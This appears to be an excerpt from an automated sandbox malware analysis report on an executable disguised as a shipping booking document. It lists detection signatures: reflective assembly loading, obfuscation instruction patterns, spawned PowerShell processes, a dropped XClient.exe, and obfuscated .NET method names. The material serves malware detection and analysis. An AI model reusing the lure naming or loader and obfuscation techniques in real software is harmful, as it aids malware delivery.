Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	.Net Code: OOhr3a1YQb System.Reflection.Assembly.Load(byte[])
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	.Net Code: OOhr3a1YQb System.Reflection.Assembly.Load(byte[])
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu System.AppDomain.Load(byte[])
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227 System.AppDomain.Load(byte[])
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu System.AppDomain.Load(byte[])
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227 System.AppDomain.Load(byte[])
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	.Net Code: _4qZ9RqLLGP44xXNmp2yU0BCZiruHdYKJFgKMs4eoIxwSJOsJK55OLEpezf8IuMLvAl3RXcpFAacfInWz53O227

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_02FC87E8 pushad ; iretd	1_2_02FC87F5
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_05CE2CE8 pushfd ; iretd	10_2_05CE2CE9
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_05CE2C90 push eax; iretd	10_2_05CE2C91
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_042D42CD push ebx; ret	13_2_042D42DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_042D2CA5 push 04B80721h; retf	13_2_042D2CEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_042D5DD0 push esp; ret	13_2_042D5DE3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_042D3ACD push ebx; retf	13_2_042D3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_0414634D push eax; ret	19_2_04146361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_045F629D push eax; ret	21_2_045F6351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_045F2C5C push 04B80753h; retf	21_2_045F2CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_068E62CD push eax; ret	25_2_068E6381
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_056FC590 pushad ; ret	28_2_056FC591
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_056F7460 push eax; mov dword ptr [esp], ecx	28_2_056F7464

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Static PE information: section name: .text entropy: 7.978661790486835
Source: BhTdjGetAH.exe.1.dr	Static PE information: section name: .text entropy: 7.978661790486835
Source: XClient.exe.10.dr	Static PE information: section name: .text entropy: 7.978661790486835

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, XuBBOyqZHedkChRurO.cs	High entropy of concatenated method names: 'duSZ0GBT1D', 'iJGZutdYTH', 'ptPZ2fx5xB', 'OhDZFgbBsy', 'dFfZoBbnkq', 'KmkZKFCRM7', 'OlNZwmNXfX', 'BH8Zf9IIul', 'BSgZElJexP', 'BymZIUuR4l'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, lLoOpbp98ceyYJEt7Q.cs	High entropy of concatenated method names: 'pxi3SRTcJ', 'xcMTrMTOZ', 'euJeBDWTj', 'Y6vOr9khC', 'XNhuUc6bP', 'GRWUZv07X', 'iixiONekonRbkIQxVT', 'ihPe84nADxxKEbGbXg', 'UARjNKU6L', 'mXF7Q1IVP'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, e3Vm7DUU0l9H9RyBUx.cs	High entropy of concatenated method names: 'oK2y1fDchN', 'iUNyOmcmnB', 'KcYlHMyR7P', 'uVglov0tav', 'gi6lKV6IlJ', 'oKPlMFSgMN', 'XM4lwp20dw', 'iwOlfuQ01L', 'sJ9ld0sZ3e', 'gpPlEkhZtt'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, kE2Srp2ld2AAdsRnJr.cs	High entropy of concatenated method names: 'OWCPN762bO', 'rfsPcVOtoL', 'DUZPybZDkG', 'RinPXRX6cn', 'BmyP4ZnOcj', 'GBtyClx496', 'KltyYkQ4I0', 'LTBytFXYTN', 'dDByhE5uQN', 'y3WyLnVSG9'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, hM4Gbid7ianNtZiD8K.cs	High entropy of concatenated method names: 'GWlX9jiZYI', 'x1uXsJZ3yp', 'S4UX30AIGf', 'CQpXTyxe8n', 'v3nX13WmcB', 'C7mXecGXau', 'RsdXOivEio', 'aw3X0WNi6C', 'tsqXuHR1QM', 'W3BXUNQre5'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, HxNAiq5aRigM2OIS7K0.cs	High entropy of concatenated method names: 'UAJQ9gZTL6', 'pioQsNanLE', 'ySeQ3i7UCj', 'abVQTZryRI', 'akMQ1SRZik', 'WmQQeVHrQw', 'HXXQO69q4b', 'reUQ03pLg6', 'e7bQu0NlIW', 'Oo0QUbn27e'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, KaR3uUBI0MjM3PHugT.cs	High entropy of concatenated method names: 'oCAQ5sPUBr', 'ayiQVcftou', 'kujQrS3tXd', 'xq0QSLdNwT', 'h6oQcXDOcu', 'gERQyIlHPv', 'uKyQPHodAF', 'xJHjtydHWm', 'Lf2jhp2moM', 'oZKjLmI9Lk'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, EJxCOd0IK9HWBTygqT.cs	High entropy of concatenated method names: 'YOxcboSUkO', 'SCvcxf2s3i', 'vM7cimoL8W', 'wIPcW4K0cN', 'EHrcCNbSt0', 'KqxcYB1R5j', 'mxOcttvlma', 'SZ5chGX3AD', 'CXhcLBDlIe', 'wT0cB2A0t4'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, hSfCAGu12LdJc86UdL.cs	High entropy of concatenated method names: 'RbalTHaF87', 'BebleRZGyl', 'I4hl06a9lo', 'vw0luP5ZtK', 'xkVlJOKvRh', 'FoElm8ZPvh', 'zZrlAcjos4', 'KhQljFdkPG', 'PCalQqeZQf', 'yeil7ID6qX'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, UYrVFP5VpNDvklhDEYZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Re77bBab9i', 'qj07x5QNvN', 'RGB7iWxWXn', 'Ixh7WggVY8', 'jew7CTFG3y', 'SVp7YoyEs5', 'txW7t7horV'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, NRj2udzPuinToaZAkR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HvFQZovY2u', 'XYhQJ8hbbD', 'gNLQmXuctj', 'WOvQAjEgTa', 'sAQQj2U3sT', 'pjlQQlBdyX', 'KhGQ7Gb740'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, m1JhKuWAltth18afAA.cs	High entropy of concatenated method names: 'UhRAn6RCGf', 'u5JAvpuvAe', 'ToString', 'IhRASYpXwi', 'SLhAcuA29b', 'IifAlBmCbM', 'uJTAysBLEn', 'oxiAPE0BpS', 'IxEAXPnqC1', 'eOaA4pfacg'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, ErbZs0FKsqSRkoQOs9.cs	High entropy of concatenated method names: 'vEd70HmxuMqKWpebZi6', 'UfrJN8myxn22E0b4uwT', 'o3PUnkm6FfrAtReSwod', 'AB8Pjk2GPn', 'Ur4PQOHVWY', 'mWAP7E5Wmb', 'Rrg8GDm059NPq54hnoF', 'XVZy9PmjmWiiwNjSoXL'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, Jit5a6i5l2yO4HDS69.cs	High entropy of concatenated method names: 'ToString', 'iKZmI3tE7S', 'jLAmFicqCj', 'OeXmHbErlc', 'HhnmoLn7q3', 'bDkmKn6Uhl', 'iugmMkRxtE', 'tQ0mwedx4v', 'swBmf2pBn7', 'P57mdGEIFD'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, OUgrSjc9E7Xf2gdhkq.cs	High entropy of concatenated method names: 'Dispose', 'raM5L8Y5vV', 'SQ9pFXBOIM', 'muCmmrUARs', 'ego5BXfnv2', 'woI5z1vR9v', 'ProcessDialogKey', 'jEJpaHQHnP', 'nW5p5hfyC1', 'CKpppwaR3u'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, kLsM8MYfJ8Mq09ivr4.cs	High entropy of concatenated method names: 'ssaAhwijh3', 'cvtABMfYQG', 'oM5ja6USSK', 'c5pj5rouXP', 'tHSAIRUPlT', 'ErMAR9nmyZ', 'A34Aq2HZc4', 'LovAbPFIdy', 'kNDAxUxIBm', 'DbdAicJ4ob'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, oHQHnPLvW5hfyC1eKp.cs	High entropy of concatenated method names: 'SBSj2iym1b', 'Aa9jFE5Fp7', 'TmcjHuT6f7', 'G0Ajon8F75', 'DMxjbUhxuR', 'rg8jK8fouM', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, toXfnvh26oI1vR9vXE.cs	High entropy of concatenated method names: 'E1ejSXZ3cF', 'lTcjcBfF7Q', 'RhPjlLOcgZ', 'xSejyiGTyh', 'SvSjPWMKh6', 'AghjXmCJ1V', 'Wm5j47rPuG', 'HIAjkiSyoi', 'ThBjnpDkGK', 'VNDjvTmWas'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	High entropy of concatenated method names: 'igfVN8Y1LQ', 'NxBVSWcsyl', 'H1pVcbu3yZ', 'u4AVl4Xx1J', 'miiVyQn0Hr', 'BIdVP8BgwE', 'i7NVXKF4lf', 'RevV4MmKuj', 'Mo8VkkDvUw', 'Kg4VnbhPC9'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, b6FpHuraoQLlIMotTo.cs	High entropy of concatenated method names: 'Vyu5XJxCOd', 'OK954HWBTy', 'w125nLdJc8', 'wUd5vLN3Vm', 'PyB5JUx4E2', 'frp5mld2AA', 'Xtekrbic51NgvwMxTI', 'lP60E7kFUtIOAdPDfa', 'X6O7h6JE6yC97g6pit', 'xaZ55yketZ'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.cs	High entropy of concatenated method names: 'GgpMcZhIjR4120pY8u6uCAiRH4QL01oA8al3eaKERyo7Gz', 'ox5p61KJCv91fSFYDHVf3yI6mIZn5ghkne6RW0Q8ZPdDkx', 'TkIpa4am8tCYuP2dbxBDwmHKEDZIHnVId2GnDhDqTVhJPo', '_3e2Pfn3Q4rzLu9onfN67v8ko7Z5GrYRUc35ZD0QCHbo1YY'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, PHumo8U1BHf4b2B0BWI8ZjmYpkj0.cs	High entropy of concatenated method names: 'RFCRLGhpvr9NYR00cC1jYzzhNoGc', 'IqIjmnuxJ3fJRXpWx5i6p06BvknH', 'h0QcBPr1tUpbbttnFh9pKeMIsLO0', 'JSwQAKrE3hy1Xa8kCeMUMHl7tDFE7zJBBkYpqtl37oquI8kO6qW3jvG253n2hGlwshqFcUIXl44Oait8Y', 'fhf8l63mvf58nkljMdtns2rS0jJ2Ku25GBqPsf8n0AKTalQsLlJ1tFYxXYqj7TVM2LHXF5CxOxaHtM6jA', 'vQNlFV5MYsgGnmsnjddhs1LPn3prl9t7ngD4qJeNWZriEhRxGwEXYYAjMr6ahuqzuXFsZfVbLVzkS41Vy', '_8AGsKmcQHxtfYjXjvmBkfPnUSkoIgwMqT93GOJ9ShoozPTN2nEFJUp1bsZ9zGgtDGeiV63iY7TYgp9hVJ', 'tjTEJDI9pAPfnZ6wp0X14AFZ0NjjbgGWPfaONvZW9uBIRqGF58ytx59qIdox5dfKk6pi14jdQPhI5tn1s', 'OgjQKOuHxlVXiA61HD7fxqZ7wejN9zDbP17G8kaz8wQSe8FZyV8JQxKKzHnOgBQzAe9fJZzpQEsYpLtVb', '_0rspqqxb6onB15LoNuYaKLkSfLMALfE6Z1AIUy9jHx0zKOpBrulxBSe7HFGDte3YPXrP3wiRXGoncCsf4'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, whVbSFDbmJZTsAWLMmphob7SHg0R4bdRNw2BjvOoEgTOMDBCDU1CAVgGsNaFR02HhbWUm.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_3pDfniDpif4ffCBHzv5bH1QqY4RRTgrkEK1pAzNpcDMSMZ', 'xKtnUdWSHKGxkHapMrBiNIn04Rff5XQTqCAhUYQp3i1Ggx', 'IWSntankFfmsXsov89pEhnqj0oTXRR78x8ELNzBMVcL2JJ', '_8L49Fnel5Kq4GFLrTxXWrAGEUYk8hdJyXj47Eme6zHmspu'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	High entropy of concatenated method names: '_6koM63edaR5ulqE8qZJ1WgfYyvzN', '_7JiPm57tnavbvPzY74rgM9y1iJtT', 'Aruijh1no96v0wVBvnLbY4snFt73', 'ctiNUX9oq9EA4zH4jODZblffSAJF', 'uPdhKbuy6nqCVVLRnJ6jlllGGP6d', 'TiPpfFy5VhN0zMwKD1gVMbOzfSgC', 'lXZRxavinAOWbg1hvsGcejk4lw4T', 'KtJjpUvLXGQDROyJaC0DNFqmSRq2', 'xUy9HRbOaV30MYPN9VXbdD8DmCAG', 'LkU1GalO3bNCgLqOcLGi821bM6ee'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	High entropy of concatenated method names: 'Fp8pNXY4fhbes0H5oqiR8jKEBZEH', '_661Zzgo0pdE0U75TsTzuzFsDxHOT', 'rQ2gSBrFnkVUvLbZzLv5ga4o1pjx', 'UCcjzA6PAlfE2LxhvhTzGIXPhpAn', 'baQZZMeWmiqPU9EJp6SLbI5WXnomZoJDRueuC4pQoapccESUO2SzgGF5UW5HlaX2', 'A4xs6CjXolI6X30mxALRiJYTF8jqDZBrf40ysFqc4pWKIxeGhOeiWbew8EvVGJHd', 'b3cjtVyVHy9zn50JJ5VOzoqy9EMuKOGdSQmDI3WGcp0IZVtEsyfaieiqbwg2ahfZ', 'jWzPAkZaZrbCLng1y4jaCC6NLxIzXJIygYb4p4AFgh3XWrw1T9oOD8DL6DWBbM9m', 'f3fHFHct6Px3fevqcMWLBTtjkvfS5HcXz10fUaugglZl9jCzhTqBRW6VQu3ewMiq', 'yZoTAMVjT8hplHJxEV3mjagEx9xvoZqVFtOwVLOVjYWXniPhmYJo75x715dDVsz8'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, s9dzM1HbtTjuXC0T1gSDLB6YlRyDPDyrsQnUAGJGlfWeIFsb33G7o3.cs	High entropy of concatenated method names: 'YcCjk3IRCObvHMNKMfV5o4JSwqVjJYT1ETNC6aRecigMKuqUdX5APZ', 'ixJfdrn6LmwxBbYqgAQnXHR6cgG4nBXj4IdKSYxZWLEje25t7Nm6yU', 'uI78gH23bYal3ybMgr5SDQ3jxmJauyJOfydInZdQ8YffU2zELInMup', 'rdH4HQDf1a9aNYxd1TahzVo8PVO43P6qqwvd0G37maRMv3Z2YsRPmc', 'PaWhnJq9AXy51DsxUYezajDEGfJmiJBKsgzrEbVTlzuFPl2rzTRpN1', '_4BQ3DYannZfE3inYu8TtN3LJ7bFFN00q4eDZhhXWOtxUha', 'LYP31KzmBPtTPIrJIXUvUmQyEbR61Hucx3zGN638UF8FER', '_4ylbuqAJcOlS2lIcVcLmG4d4ZDytwPkBvYEzBziO5CSMPj', 'u5au5R4NydQwiRRRzPLH5eU6pdIvTWiifOU5lTaTXU3dUV', 'Vy38Lr2Vq6EYkCa15HxNy0HDTCTj4xkkNIU9G2f6a3p64C'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	High entropy of concatenated method names: 'Vf08JYGAkuTJj1mNDuDSCynOx0Aj', 'dH7UkHxKG6zZ76Y42GmShdJcWCsdbHvYbbyWkQQ7cK2zHuz3RxUM6rXRlDqFqjKIgPpcU8ZvUOylxb8ddA4Y19DpCFXx04uw', 'kliHKYqxak7Y74K8xlHEw9jt1cE0LM96QYNbTzXH4VXuyNOznmFWkMFlAcECwfovp7xJdAUUJl0snMeMOdCThGd90PFaBWeA', 'bbfKzODoV2L06uXUsb35VYp7jJKXS8TBJ1WNakloVaPAZs5WhPpM9tumpwLjeXQxrZBA6gTGRhmttjSVhO5A2C80oBSC1WVP', 'aHd9iypJYBPTbdtQCl7Ok99x1nZUZsZEsznscbKdjYqFQj2Eh0WqN3YUy5jfCvoF4Hkovb9mJM9yDlly3rIm0ji28Sndw6UJ'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	High entropy of concatenated method names: 'Ththm9CTOMvvm2GyNP8Qzr24jCjdhMSqMKmhGwieTi4yMTgC9uFPmmdsAe4xySIKQP361XwPWd1jaCxGPBsjil', 'jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu', 'nAdoeyR1X8X4pimRSBLRLbXwGT6W9c31d2Z10qpK3IzMJnrNxioP5NQy25IioTNLsewZuuBGAaHrCzUj5jEOAh', 'dJQnzA612gtw8ujHxNeqyoOpAvcq8ssRQdsUZAPJ3IZR8rstxuV33yW272jijI13uLrtXrFKCCWd8euuaUY88b', 'u3NX2j7yUQ2p5r4rSnWttUtn1p6VOv7DiD5VILIwDty9G35z89Oov1SydYyzJhrxg4e7vxqrMtI5kzaavcpj4i', 'CPbcyxXDzJ13yCHordyvUP7bVO8xstIqlm68LEXaJo3q4Imu7yi53EXW0m26voMKdC1ab71UnUAqIVbSuUKUq4', 'fM95BZOdW1fmoxegIukzIdcbcty9Go2kvqFfc5EgSUVZfnVQmENPBKqb36sScN93vgiBPrDVnyajk7FoYGvHbC', 'fGAZW4e1W335OvTNw6qX9ZkZtnP6cnHp8wSZ3IDUIuPsNS75Rj1jVp7q2pfDknuUu0uag0KvV0cpgPsPR1a7VO', 'ej1ormzl2jKuOvMwjZ6nm4OM9aHYcjo27iz0oiFHIsNXUAA6XEkXASwwmlmE3nZrzYdlM8WD0aW1DucD6VIcio', 'K9kZlQvWNJvWU7lLA1FD5UujO7vk5bDIjo82PCKpprPgg4mufa91tBmYvFvdedKXqLJKPekHWnHrhD1pc3O63u'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	High entropy of concatenated method names: 'B23wVkYTRRlbvZPXNLXxIoOG2zrc', '_1nQfddviA6nptTfkr6TfyQY4rgxN40GBmufbL4TjTGyzc4njPykP4mxfk7CDp08r', 'ConDlLttcHyi0bvUIXIvd7ZhdNhwTtGLWyDDdezukc6tpfqHJUpxh0Y8lIuoBBJO', 'xffgxamw2yiuFaeTRpUFcPK0Fb3CaJgPpY9bMzjBfhHYcGZYQWY3vbWC8ITRQJOV', 'b3Ceji6v4OiedAr2PLCKgpF3X5xQkHVhOQ5aKhoQL5ukRlGZsSklPpLulBwOFUqc'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	High entropy of concatenated method names: 'Y1ITG5MBR8142OiTMq6Zq60AoqWLOu7vDN9kZguwRz4rrKYDeseG8s', 'YRJFCxHjM7pPS4tNaT7iQrZf3P0nMtI4vOCFptxbgzKLYau24ZfSVv', 'nCJtZvaszp6oSFBL7GMdxt7QYF2vHScvtNGMXj2FMFL1HGIapNV4Nm', 'unpnLLLGMEjTQEUUBSj3mxvpQAbkt5HxZNTRjEyRODRSiZxTDm3ZG1', 'RAt0CxcgEb13BldbyvusZ6MAjrul1qh5NtQmMsF3SUmeKVwNx3CMeJ', 'duRVETZzWT64PiCNxiLb2ZTVL5cyIBFb0Tz44PVeMxvn6DYdrsjb0y', '_9hDXJ4K0XixM3bAx328T6bJ8kA4hPCruVIEYrs79DPLZYdXXXxG7C4', 'e4J5jbEn0rCBRh9jVC2QZTf9G24OA5JndJL1xso81EK2Rz4K5HXSVT', '_9jFrliaKxwwrVaHlKlmyHrIWBPEAljm6iyt2h7SJgRhygyHojB5BdN', '_9HnDvdBf3YlSqtdiZPhJ6vE7g42q2TY16T744fQeuQP8swsNcqvl7X'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	High entropy of concatenated method names: 'zqSbnYJ7TRzPGM4DTBz55wB90X1H', '_4oLwAniIUZb3pHfgNlXqONekWHg3', 'CDzVFa3gZC10reMa61ZgV5cAkx86', 'sRTHUEnQNBOe33KZfvWLwDJhWgNw', 'jVgxlhUWvyKuBGP8wBjwY8ZLosae', 'bpEpLSR4YKp0SwBpXSNr4FZBegZ3', 'JEcOqiKQuo1NMNAgJ57suc0Fv4mR', 'zXHcrIVLQWaWHBgyaBEeGMLqmc93', 'IMzLMpiHmTzbaQSc0F1wjAm9srhz', 'rHGQSVSfZ2Gp1JnWnS0x8LpowN1k'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.cs	High entropy of concatenated method names: 'GgpMcZhIjR4120pY8u6uCAiRH4QL01oA8al3eaKERyo7Gz', 'ox5p61KJCv91fSFYDHVf3yI6mIZn5ghkne6RW0Q8ZPdDkx', 'TkIpa4am8tCYuP2dbxBDwmHKEDZIHnVId2GnDhDqTVhJPo', '_3e2Pfn3Q4rzLu9onfN67v8ko7Z5GrYRUc35ZD0QCHbo1YY'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, PHumo8U1BHf4b2B0BWI8ZjmYpkj0.cs	High entropy of concatenated method names: 'RFCRLGhpvr9NYR00cC1jYzzhNoGc', 'IqIjmnuxJ3fJRXpWx5i6p06BvknH', 'h0QcBPr1tUpbbttnFh9pKeMIsLO0', 'JSwQAKrE3hy1Xa8kCeMUMHl7tDFE7zJBBkYpqtl37oquI8kO6qW3jvG253n2hGlwshqFcUIXl44Oait8Y', 'fhf8l63mvf58nkljMdtns2rS0jJ2Ku25GBqPsf8n0AKTalQsLlJ1tFYxXYqj7TVM2LHXF5CxOxaHtM6jA', 'vQNlFV5MYsgGnmsnjddhs1LPn3prl9t7ngD4qJeNWZriEhRxGwEXYYAjMr6ahuqzuXFsZfVbLVzkS41Vy', '_8AGsKmcQHxtfYjXjvmBkfPnUSkoIgwMqT93GOJ9ShoozPTN2nEFJUp1bsZ9zGgtDGeiV63iY7TYgp9hVJ', 'tjTEJDI9pAPfnZ6wp0X14AFZ0NjjbgGWPfaONvZW9uBIRqGF58ytx59qIdox5dfKk6pi14jdQPhI5tn1s', 'OgjQKOuHxlVXiA61HD7fxqZ7wejN9zDbP17G8kaz8wQSe8FZyV8JQxKKzHnOgBQzAe9fJZzpQEsYpLtVb', '_0rspqqxb6onB15LoNuYaKLkSfLMALfE6Z1AIUy9jHx0zKOpBrulxBSe7HFGDte3YPXrP3wiRXGoncCsf4'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, whVbSFDbmJZTsAWLMmphob7SHg0R4bdRNw2BjvOoEgTOMDBCDU1CAVgGsNaFR02HhbWUm.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_3pDfniDpif4ffCBHzv5bH1QqY4RRTgrkEK1pAzNpcDMSMZ', 'xKtnUdWSHKGxkHapMrBiNIn04Rff5XQTqCAhUYQp3i1Ggx', 'IWSntankFfmsXsov89pEhnqj0oTXRR78x8ELNzBMVcL2JJ', '_8L49Fnel5Kq4GFLrTxXWrAGEUYk8hdJyXj47Eme6zHmspu'
